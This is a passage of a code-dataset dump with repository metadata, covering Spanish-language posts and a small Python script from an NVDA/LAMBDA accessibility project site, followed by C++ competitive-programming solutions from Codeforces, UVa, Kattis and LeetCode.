Tambien puedes hacer de detective y mirar quién hace commits en tu/s idioma/s en el repo screenReaderTranslations de assembla.com.\n\n\nY esto es todo, no tiene mucho más. Gracias por tragaros el tocho. Ah, y suerte.\n***La tabla españoala fue construída ena colaboración entre José Manuel Delicado, Salva Doménech y yo, con el autor. Agradecimiento especial a José Enrique Fernández del Campo por sus detallados reportes de errores que intentamos corregir antes de la publicación de la tabla.***"
},
{
"alpha_fraction": 0.5710955858230591,
"alphanum_fraction": 0.6037296056747437,
"avg_line_length": 25.875,
"blob_id": "af2ec2e43585585da304ba1c44ca87f49301b897",
"content_id": "41a1f975f6ad8ef18aadffa74b1c29d78f836437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 16,
"path": "/linked_files/dec_to_hex.py",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\ndef procesar(file):\n\tf1=open(file, \"r\")\n\tcontenido=f1.read()\n\tf1.close()\n\tlineas=contenido.split(\"\\n\")\n\tf2=open(file+\".txt\", \"w\")\n\tfor linea in lineas:\n\t\tif linea.find(\"=\")==-1:\n\t\t\tcontinue #pasamos a la siguiente\n\t\tl=linea.split(\"=\")\n\t\tl[0]=l[0].replace(\"\\\\\", \"\") #quitamos la barra invertida\n\t\tl[0]=format(int(l[0]), \"x\") #convertimos de decimal a hexadecimal\n\t\tf2.write(l[0]+\" \"+l[1]+\"\\n\")\n\tf2.close()"
},
{
"alpha_fraction": 0.7061538696289062,
"alphanum_fraction": 0.7476922869682312,
"avg_line_length": 42.33333206176758,
"blob_id": "158caeda62c1bac70f43f2bf4c75798060c95d50",
"content_id": "d98be8056a67b4db801a32a4e497495f00cc5686",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 664,
"license_type": "no_license",
"max_line_length": 358,
"num_lines": 15,
"path": "/a/ya-esta-aqui-la-version-120-del-complemento-para-lambda/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!--\n.. title: Ya está aquí la versión 1.2.0 del complemento para LAMBDA\"\n.. slug: ya-esta-aqui-la-version-120-del-complemento-para-lambda\n.. date: 2017-08-10 10:23:20 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nLa versión 1.2.0 ya se puede descargar desde el sitio oficial de complementos. Esta versión añade las traducciones para búlgaro, francés, rumano y serbio, además de actualizar las traducciones española y gallega. Asimismo la traducción italiana se ha transferido al responsable del idioma en el equipo de traducción, de forma que se podrían detectar cambios.\n\ndisfrutad esta versión.\n"
},
{
"alpha_fraction": 0.7542955279350281,
"alphanum_fraction": 0.769759476184845,
"avg_line_length": 54.47618865966797,
"blob_id": "7a4f186c5fa59a483db788e7735700770c2f72a1",
"content_id": "44b3bc3eb700800dcee57df68baa432c10568cb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 430,
"num_lines": 21,
"path": "/p/about/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: sobre Nosotros\n.. slug: about\n.. date: 2017-05-24 17:34:47 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n-->\n\nBienvenidos a la página web de la organización lambda-nvda-esp en GitHub.\n\n## ¿Qué hacemos?\n\nconjunto de usuarios españoles de LAMBDA con NVDA o desarrolladores de Python centrados en la mejora y expansión del uso del editor matemático [LAMBDA](https://lambdaproject.org) (Linear Access to Mathematics using Braille Display and Audio Synthesis) con el lector de pantalla gratuito y de código abierto [NVDA](https://nvaccess.org) (Non-visual Desktop Access) en el idioma español o los diferentes idiomas oficiales en España.\nEste sitio servirá como tablón de anuncios y lugar para seguir las actualizaciones a las traducciones y ampliaciones a la tabla braille, debido a que tanto traductores como desarrolladores de la tabla braille estamos en esta organización de GitHub.\n\n## Contacto\n\nPara ponerte en contacto con nosotros puedes suscribirte a [la lista en inglés sobre LAMBDA con NVDA](https://groups.google.com/group/lambda-nvda) o enviar un correo al propietario de la lista en [[email protected]](mailto:[email protected])."
},
{
"alpha_fraction": 0.7128851413726807,
"alphanum_fraction": 0.7549019455909729,
"avg_line_length": 50.03571319580078,
"blob_id": "7b183e40cec7571a4a564a795a2de15b9562f109",
"content_id": "9f333558a635017e484e190dc22a3c93984bbbe1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1451,
"license_type": "no_license",
"max_line_length": 382,
"num_lines": 28,
"path": "/p/distribuidores/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!--\n.. title: Datos de contacto de distribuidores LAMBDA en España\n.. slug: distribuidores\n.. date: 2017-08-11 20:18:49 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n-->\n\nEn España solo existe un distribuidor a gran escala de LAMBDA. Si conoces o formas parte de algún distribuidor autorizado LAMBDA y deseas ser incluido en esta lista ponte en contacto con [[email protected]](mailto:[email protected]).\n\n## Listado de distribuidores\n### Centro de Investigación, Desarrollo y Aplicación Tiflotécnica de la Organización Nacional de ciegos Españoles (ONCE-CIDAT)\n\nCno. de Hormigueras, 172 \n28031 Madrid; Madrid, Comunidad de; Spain \nTeléfono directo/Direct phone: (+34) 917 097 600 \nteléfono atención a usuarios/Users attention phone: (+34) 910 109 111 (opción 2, CIDAT) \nFax: (+34) 917 097 777 \nEmail: [[email protected]](mailto:cidat€once.es) \nWeb: <http://cidat.once.es> \nAll telephone numbers above are diallable from outside Spain./Todos los números de teléfono arriba son marcables desde fuera de España.\n\n#### Adaptaciones de puesto de estudio\n\nLa ONCE concede gratuitamente a alumnos de enseñanzas oficiales con motivos justificados, el editor LAMBDA. Para obtener más información, puedes ponerte en contacto con el centro de la ONCE (DT, DZ, DAP o agencia) al que estás adscrito, o en el CRE del que educativamente depende dicho centro. Más información sobre los servicios educativos de la once en <http://educacion.once.es>."
},
{
"alpha_fraction": 0.6134969592094421,
"alphanum_fraction": 0.6687116622924805,
"avg_line_length": 24.153846740722656,
"blob_id": "0d52af034386f6056cc030b817e825865ae9fdaa",
"content_id": "c1f3884aa16b92e163ce5d266f96b76aa0ecd33e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 13,
"path": "/a/bienvenidos-a-la-web-de-lambda-nvda-esp/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: bienvenidos a la web de LAMBDA-NVDA-esp\n.. slug: bienvenidos-a-la-web-de-lambda-nvda-esp\n.. date: 2017-05-24 17:43:03 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nPues eso, bienvenidos. Podéis obtener más información sobre nosotros [aquí](link://slug/about)"
},
{
"alpha_fraction": 0.7509377598762512,
"alphanum_fraction": 0.7786946892738342,
"avg_line_length": 94.21428680419922,
"blob_id": "fbbb9c19b6cb02859ef8a329d9cf3e9139bc9621",
"content_id": "a2d8371b9c06774c6514214d583bf607f7ee9973",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1350,
"license_type": "no_license",
"max_line_length": 794,
"num_lines": 14,
"path": "/a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Actualizaciones de agosto a octubre de 2017: versión 1.2.1 y transición a NVDA.es\n.. slug: actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes\n.. date: 2017-10-23 17:47:32 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nDesde agosto se han realizado varios cambios reseñables en el complemento. Por ejemplo, la publicación de la versión 1.2.1 del complemento que ya se puede descargar desde la web oficial e incluye mejoras relativas al braille.\nPero la novedad más importante que hay que anunciar llega este lunes 23 de octubre. Debido a que se ha creado y presentado una nueva y completa web para la comunidad hispanohablante de NVDA, se ha decidido que los contenidos de esta web se integren en la nueva, de forma que los usuarios puedan conocer todas las novedades sobre NVDA y su entorno en un solo lugar. Así pues, se anuncia que desde ahora y progresivamente se comenzará a cambiar cierta información de interés general. Al final del proceso la vocación de informar sobre LAMBDA con NVDA en español con la que nació esta web será transferida a NVDA.es. Seguiremos informando y para finalizar aclaramos que no cambiarán las personas que están detrás de este proyecto. Gracias por el apoyo, y sobre todo, por el uso de nuestro trabajo.\n"
},
{
"alpha_fraction": 0.7583262324333191,
"alphanum_fraction": 0.7830913662910461,
"avg_line_length": 67.88235473632812,
"blob_id": "60ca296be64ece3e82dcf39dc33c6d4f2d68b1be",
"content_id": "d218337f55c1ba7fff13934e8aa3caac9d2f4b61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1185,
"license_type": "no_license",
"max_line_length": 308,
"num_lines": 17,
"path": "/a/liberada-la-version-118-del-complemento-para-lambda-primera-version-estable/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Liberada la versión 1.1.8 del complemento para LAMBDA, primera versión estable\n.. slug: liberada-la-version-118-del-complemento-para-lambda-primera-version-estable\n.. date: 2017-06-19 12:25:53 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nHoy día 19 de junio, como estaba previsto, ha sido liberada al público la versión 1.1.8 del complemento para LAMBDA, descargable desde [https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon](https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon).\nEn cuanto llegue el complemento al repositorio de traductores en Assembla se actualizarán las traducciones. La traducción de los mensajes está actualizada, pero la de la documentación es la que necesita ser comparada y traducida para estar en consonancia con la original en inglés.\nDesde aquí continuaremos trabajando dando soporte a la tabla braille española y a las traducciones española y gallega.\n\nCon esta versión, al fin, se culmina un trabajo de varias personas desde septiembre que ha conseguido igualar el soporte para LAMBDA de NVDA al de Jaws.\n"
},
{
"alpha_fraction": 0.7712206840515137,
"alphanum_fraction": 0.7857720255851746,
"avg_line_length": 76.3125,
"blob_id": "53ee8e51f557991dd7884494311630a203a0c502",
"content_id": "38f87d7584e43e36fb1d9166843a0b7acd83f5ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 645,
"num_lines": 16,
"path": "/a/actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Actualizadas traducciones: añadida traducción para el mensaje de alerta de perfil lambda existente\n.. slug: actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente\n.. date: 2017-05-27 13:23:02 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nEn el día de hoy se ha enviado la pull request al repo oficial para incluír en la versión inestable (rama master) las últimas traducciones (español y gallego). En ambos idiomas se ha traducido el diálogo que avisa de que un perfil llamado lambda ya existe (en su nueva versión). se recuerda a los usuarios que la versión dev en el sitio de complementos no incluye traducciones. Para descargar una con ellas está disponible un enlace en [la web de la [comunidad hispanohablante](https://nvdaes.github.io). También puedes compilar uno si cuentas con las herramientas necesarias, descritas en la documentación de desarrollo de complementos de NVDA.\nEsta será probablemente la última traducción que se envíe por este método, ya que cuando se declare una versión estable las traducciones pasarán a administrarse a través del repositorio de la comunidad de traductores.\n\nSeguiremos informando.\n"
}
] | 10 |
anhoangphuc/CP | https://github.com/anhoangphuc/CP | d0fcc3f4c25f3216f02d1dfdd68cf817a336a0f3 | 609f18852bd76dbc7b2ed52e44f3b58095e8c3b9 | a6334a20b6fb6cfe8cb422dab980c09bd69eff50 | refs/heads/master | 2022-07-19T11:42:36.017438 | 2022-07-02T04:11:24 | 2022-07-02T04:11:24 | 208,000,598 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.29596978425979614,
"alphanum_fraction": 0.32430729269981384,
"avg_line_length": 26.909090042114258,
"blob_id": "87188550123815e1034a6a092faa9d36458543fc",
"content_id": "6c024a62df8a739f0dbdcd767269c9a5bdc349a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 55,
"path": "/codeforces/266446A.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\ntypedef long long int ll;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >=b; i--)\r\n\r\nconst int NMAX = 3e2 + 3;\r\n\r\nint a[NMAX], n, k;\r\nll f[NMAX][NMAX][NMAX];\r\n\r\n//--------------------------------------------------\r\nvoid openf() {\r\n freopen(\"bonus.inp\", \"r\", stdin);\r\n freopen(\"bonus.out\", \"w\", stdout);\r\n cin >> n >> k;\r\n rep(i, 1, n)\r\n cin >> a[i];\r\n}\r\n\r\nbool valid(int i, int j, int v) {\r\n return (i <= j && v * 2 <= (j - i + 1));\r\n}\r\n\r\nvoid process() {\r\n rep(i, 1, n - 1)\r\n f[i][i + 1][1] = abs(a[i] - a[i + 1]);\r\n \r\n rep(t, 2, n) \r\n rep(i, 1, n - 2) {\r\n int j = i + t;\r\n if (j > n) break;\r\n for (int v = 1; v <=k; v++) {\r\n if (v * 2 > t + 1)\r\n break;\r\n f[i][j][v] = max(f[i + 1][j][v], f[i][j - 1][v]);\r\n if (valid(i + 2, j, v - 1) && f[i][j][v] < f[i + 2][j][v - 1] + abs(a[i] - a[i + 1])) \r\n f[i][j][v] = f[i + 2][j][v - 1] + abs(a[i] - a[i + 1]);\r\n\r\n if (valid(i, j - 2, v - 1) && f[i][j][v] < f[i][j - 2][v - 1] + abs(a[j] - a[j - 1])) \r\n f[i][j][v] = f[i][j - 2][v - 1] + abs(a[j] - a[j - 1]);\r\n\r\n if (valid(i + 1, j - 1, v - 1) && f[i][j][v] < f[i + 1][j - 1][v - 1] + abs(a[i] - a[j])) \r\n f[i][j][v] = f[i + 1][j - 1][v - 1] + abs(a[i] - a[j]);\r\n }\r\n }\r\n cout << f[1][n][k];\r\n}\r\n\r\nint main() {\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.31506848335266113,
"alphanum_fraction": 0.3219178020954132,
"avg_line_length": 19.904762268066406,
"blob_id": "3e134119f58d9b2904d57befc5f966144bdec8c7",
"content_id": "d51b9610399f5272b7f9b1ab18964c7fae2de936",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 21,
"path": "/uva/272.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nint main() {\n string s;\n freopen(\"test.inp\", \"r\", stdin);\n int cnt = 0;\n while (getline(cin, s)) {\n for (auto x: s) {\n if (x == '\"') {\n if (cnt == 0)\n cout << \"``\";\n else\n cout << \"''\";\n cnt ^= 1;\n }\n else cout << x;\n }\n cout << endl;\n }\n}"
},
{
"alpha_fraction": 0.32423755526542664,
"alphanum_fraction": 0.33306580781936646,
"avg_line_length": 17.200000762939453,
"blob_id": "2b008bc8aa009ad72e742fb844112e28947208f6",
"content_id": "0013cea29d2bde95ed40020eada5250976bc402a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1246,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 65,
"path": "/katis/froshweek.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int NMAX = 1e6 + 3;\r\n\r\nvector<int> a, b;\r\nint n;\r\nint ft[NMAX];\r\nmap<int, int> m;\r\n//----------------------------------------\r\nvoid openf() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n cin >> n;\r\n int u;\r\n rep(i, 1, n) {\r\n cin >> u;\r\n a.push_back(u);\r\n }\r\n}\r\n//----------------------------------------\r\nint getResult(int x) {\r\n int re = 0;\r\n while (x > 0) {\r\n re += ft[x];\r\n x -= x & (-x);\r\n }\r\n\r\n return re;\r\n}\r\n//----------------------------------------\r\nvoid updateTree(int x) {\r\n while (x < NMAX) {\r\n ft[x] += 1;\r\n x += x & (-x);\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n b = a;\r\n sort(b.begin(), b.end());\r\n\r\n int cnt = 0;\r\n for (auto x: b) \r\n m[x] = ++cnt;\r\n\r\n ll res = 0;\r\n cnt = 0;\r\n for (auto x: a) {\r\n int v = m[x];\r\n res += cnt - getResult(v); \r\n cnt += 1;\r\n updateTree(v);\r\n }\r\n\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.5365853905677795,
"alphanum_fraction": 0.5408895015716553,
"avg_line_length": 35.72972869873047,
"blob_id": "ea277b68398d535e2e8e6c3bdcaa47f2dae6a6f6",
"content_id": "38b504bdeaf4e59fbc9108587d8a9c69571f0626",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1394,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 37,
"path": "/katis/mandelbrot.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\ntypedef pair<float, float> realNumber;\r\n//----------------------------------------\r\nfloat getModule(realNumber zn) {\r\n return sqrt(zn.first*zn.first + zn.second*zn.second);\r\n}\r\n//----------------------------------------\r\nrealNumber addRealNumber(realNumber firstNumber, realNumber secondNumber) {\r\n return realNumber(firstNumber.first + secondNumber.first,\r\n firstNumber.second + secondNumber.second);\r\n}\r\n//----------------------------------------\r\nrealNumber doubleRealNumber(realNumber zn) {\r\n return realNumber(zn.first*zn.first - zn.second*zn.second, 2*zn.first*zn.second);\r\n}\r\n//----------------------------------------\r\nstring process(float realPortion, float imagPortion, int itera) {\r\n realNumber cValue = realNumber(realPortion, imagPortion);\r\n realNumber zn = realNumber(0, 0);\r\n do {\r\n if (getModule(zn) > 2) return \"OUT\";\r\n zn = addRealNumber(cValue, doubleRealNumber(zn));\r\n }\r\n while (itera-- > 0);\r\n return \"IN\";\r\n}\r\n//----------------------------------------\r\nint main() {\r\n float realPortion, imagPortion;\r\n int itera, testCase = 0;\r\n while (cin >> realPortion >> imagPortion >> itera) {\r\n cout << \"Case \" << (++testCase) << \": \" << process(realPortion, imagPortion, itera) << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.4767676889896393,
"alphanum_fraction": 0.5010101199150085,
"avg_line_length": 16.678571701049805,
"blob_id": "3b1dd86357b46ccf9e39b84d986ff046309cac2a",
"content_id": "48e3bb03de171369941346845b8b1d4652efdacc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 28,
"path": "/leetcode/sell_stock.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\npublic:\n\tint maxProfit(vector<int>& a) {\n\t\tint res = 0, cur = 0;\n\t\tbool buyed = false;\n\n\t\ta.push_back(0);\n\t\tfor (int i = 0; i < a.size(); i++) {\n\t\t\tif (a[i] < a[i + 1] && !buyed) {\n\t\t\t\tbuyed = true;\n\t\t\t\tcur = a[i];\n\t\t\t} else if (a[i] > a[i + 1] && buyed) {\n\t\t\t\tbuyed = false;\n\t\t\t\tres += a[i] - cur;\n\t\t\t}\n\t\t}\n\t\treturn res;\n\t}\n};\n\nint main() {\n\tSolution a = Solution();\n\tvector<int> b {7, 1, 5, 3, 6, 4};\n\tcout << a.maxProfit(b);\n};\n"
},
{
"alpha_fraction": 0.5028943419456482,
"alphanum_fraction": 0.5274963974952698,
"avg_line_length": 27.446807861328125,
"blob_id": "5fc2b8409e53c9a93b2e2243715100b17abf3d2c",
"content_id": "b1b0a2823cbf34bcd74a5cd3a01f954341d8c88e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1382,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 47,
"path": "/katis/natrij.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n\r\n//----------------------------------------\r\nint stringToSecond(string timeString) {\r\n int res = 0;\r\n res = stoi(timeString.substr(0, 2)) * 3600;\r\n res += stoi(timeString.substr(3, 2)) * 60;\r\n res += stoi(timeString.substr(6, 2));\r\n return res; \r\n}\r\n//----------------------------------------\r\nstring pad(string temp) {\r\n if (temp.length() < 2) {\r\n temp = '0' + temp;\r\n }\r\n return temp;\r\n}\r\n//----------------------------------------\r\nstring secondToString(int timeSecond) {\r\n string hour = to_string(timeSecond / 3600);\r\n timeSecond %= 3600;\r\n hour = pad(hour);\r\n\r\n string minute = to_string(timeSecond / 60);\r\n timeSecond %= 60;\r\n minute = pad(minute);\r\n\r\n string second = to_string(timeSecond);\r\n second = pad(second);\r\n\r\n return hour + \":\" + minute + \":\" + second;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n string timeXString, timeYString; \r\n cin >> timeXString; \r\n cin >> timeYString;\r\n int timeXInSecond = stringToSecond(timeXString);\r\n int timeYInSecond = stringToSecond(timeYString);\r\n int differenceInSecond = timeYInSecond - timeXInSecond;\r\n if (differenceInSecond <= 0) \r\n differenceInSecond += 24 * 3600;\r\n cout << secondToString(differenceInSecond);\r\n}"
},
{
"alpha_fraction": 0.5383244156837463,
"alphanum_fraction": 0.5579322576522827,
"avg_line_length": 24.714284896850586,
"blob_id": "c986ad578c6aa0d71a8c4ba87cc5c9f0eb9c2bfe",
"content_id": "cd60d51feda150a3bab647af25d94507b37b3457",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 21,
"path": "/leetcode/twoSum.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tvector<int> twoSum(vector<int>& nums, int target) {\r\n\t\t\tfor (auto ind = nums.begin(); ind != nums.end(); ind++) {\r\n\t\t\t\tauto t = find(ind + 1, nums.end(), target - *ind);\t\r\n\t\t\t\tif (t != nums.end())\r\n\t\t\t\t\treturn vector<int> {static_cast<int>(ind - nums.begin()), static_cast<int>(t - nums.begin())};\r\n\t\t\t}\r\n\t\t\treturn vector<int> {0, 0};\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution solution;\r\n\tvector<int> a{3, 1, 2, 1, 5};\r\n\tauto res = solution.twoSum(a, 5);\r\n\tcout << res[0] << res[1];\r\n}\r\n"
},
{
"alpha_fraction": 0.5821256041526794,
"alphanum_fraction": 0.5893719792366028,
"avg_line_length": 31.6842098236084,
"blob_id": "45b51e115d057916b7b3ffa173a200b46d97efa4",
"content_id": "2ea9397492c018b48bc55c760deffc1b8ee9001a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1242,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 38,
"path": "/leetcode/39.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <iostream>\n\nusing namespace std;\n\nclass Solution {\npublic:\n vector<vector<int>> res;\n vector<vector<int>> combinationSum(vector<int>& candidates, int target) {\n sort(candidates.begin(), candidates.end());\n tryValue(candidates, target, 0, 0, {});\n return res;\n }\n\n void tryValue(vector<int>& candidates, int target, int position, int currentSum, vector<int> currentCombination) {\n if (position == candidates.size()) {\n if (target == currentSum) res.push_back(currentCombination);\n return;\n }\n int rep = (target - currentSum) / candidates[position];\n for (int i = 0; i <= rep; i++) {\n vector<int> newValue(i, candidates[position]);\n vector<int> newCombination(currentCombination);\n newCombination.insert(newCombination.end(), newValue.begin(), newValue.end());\n tryValue(candidates, target, position + 1, currentSum + candidates[position] * i, newCombination);\n }\n }\n};\n\nint main() {\n Solution a = Solution();\n vector<int> v = { 2, 3, 6, 7 };\n auto r = a.combinationSum(v, 8);\n for (auto x: r) {\n for (auto y: x) cout << y << \" \";\n cout << endl;\n }\n}\n"
},
{
"alpha_fraction": 0.45972222089767456,
"alphanum_fraction": 0.4819444417953491,
"avg_line_length": 23,
"blob_id": "471a1faf9096de6e769a4133a3f4fd3c316cda71",
"content_id": "3e6b796e899d6ca72b769f29e6679d833dcd21ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 720,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 30,
"path": "/leetcode/zigzag-conversion.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n\tpublic:\n\t\tstring convert(string s, int numRows) {\n\t\t\tif (numRows == 1) return s;\n\t\t\ttypedef pair<pair<int, int>, char> t;\t\n\t\t\tvector<t> g;\n\t\t\tint x[2] = {1, -1}, y[2] = {0, 1};\n\t\t\tint u(-1), v(0), dir(0);\n\t\t\tfor (int i = 0; i <\ts.length(); i++) {\n\t\t\t\tu += x[dir]; v += y[dir];\n\t\t\t\t//cout << u << \" \" << v << \" \" << i << \" \" << s[i] << endl;\n\t\t\t\tg.push_back(make_pair(make_pair(u, v), s[i]));\n\t\t\t\tif (i > 0 && (i % (numRows - 1)) == 0)\n\t\t\t\t\tdir = dir ^ 1;\n\t\t\t}\n\t\t\tsort(g.begin(), g.end());\n\t\t\tstring res = \"\";\n\t\t\tfor (auto x: g) \n\t\t\t\tres += x.second;\n\t\t\treturn res;\n\t\t}\n};\n\nint main() {\n\tSolution a = Solution();\n\tcout << a.convert(\"PAYPALISHIRING\", 3);\n}\n"
},
{
"alpha_fraction": 0.39030611515045166,
"alphanum_fraction": 0.4234693944454193,
"avg_line_length": 18.63157844543457,
"blob_id": "03eb3ed2d5252d337cd9054d1e7b5de327cbf9b4",
"content_id": "0ed45a2742042332df42ce307473e584118ec84e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 38,
"path": "/leetcode/longestPalinString.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n\r\nclass Solution {\r\n\tpublic: \r\n\t\tbool f[1002][1002];\r\n\t\tstring longestPalindrome(string s) {\r\n\t\t\tfor (int i = 0; i < s.length(); i++) {\r\n\t\t\t\tf[i][i] = 1;\r\n\t\t\t\tf[i + 1][i] = 1;\r\n\t\t\t}\r\n\r\n\t\t\tint res = 0;\r\n\t\t\tstring rres = \"\";\r\n\t\t\tif (s.length() > 0) {\r\n\t\t\t\tres = 0;\r\n\t\t\t\trres = s[0];\r\n\t\t\t}\r\n\t\t\tfor (int l = 2; l <= s.length(); l++) \r\n\t\t\t\tfor (int i = 0; i < s.length(); i++) {\r\n\t\t\t\t\tint j = i + l - 1;\r\n\t\t\t\t\tif (j >= s.length()) continue;\r\n\t\t\t\t\tif (f[i + 1][j - 1] == 0 || s[i] != s[j]) continue;\r\n\t\t\t\t\tf[i][j] = 1;\r\n\t\t\t\t\tif (j - i + 1 > res) {\r\n\t\t\t\t\t\tres = j - i + 1;\r\n\t\t\t\t\t\trres = s.substr(i, j - i + 1);\r\n\t\t\t\t\t}\r\n\t\t\t\t} \r\n\t\t\treturn rres;\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution a = Solution();\r\n\tcout << a.longestPalindrome(\"cbefeb\");\r\n}\r\n"
},
{
"alpha_fraction": 0.33188721537590027,
"alphanum_fraction": 0.3427331745624542,
"avg_line_length": 20,
"blob_id": "a0955306a0a4c2f42eace13d8c9ec909bde05827",
"content_id": "7cf2982a74d33e346052057633f9175c41657f0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 42,
"path": "/katis/wheresmyinternet.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
